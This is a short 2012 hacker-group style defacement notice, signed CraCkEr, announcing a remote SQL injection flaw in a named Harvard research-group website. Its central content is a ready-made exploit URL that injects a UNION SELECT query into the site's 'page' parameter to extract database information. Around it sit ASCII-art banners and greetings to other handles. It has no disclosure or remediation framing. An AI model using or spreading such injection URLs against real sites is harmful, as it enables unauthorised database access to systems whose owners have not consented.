The gmwgroup.harvard.edu site suffers from a remote SQL injection vulnerability.
9b31adfeeeb15dba05ccae05f70de51756aa20d4affa14b0fc159a4ef8c11f8d
┌┌───────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ [ EZINE ] ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Website : harvard.edu │ │ Famous Sites Can Be │
│ Vuln Type: Remote SQL Injection │ │ │
│ Method : GET │ │ Olso Vulned │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : Database access │ │ │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│ DALnet #crackers ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
[+] Remote SQL
http://gmwgroup.harvard.edu/research/index.php?page=-1+UNION+ALL+SELECT+1,2,database()--
└────────────────────────────────────────────────────────────────────────────┘
Greets:
The_PitBull, Raz0r, iNs, SadSoul, His0k4, Hussin X, Mr. SQL, Od3d99aa, adal .
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2012 ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘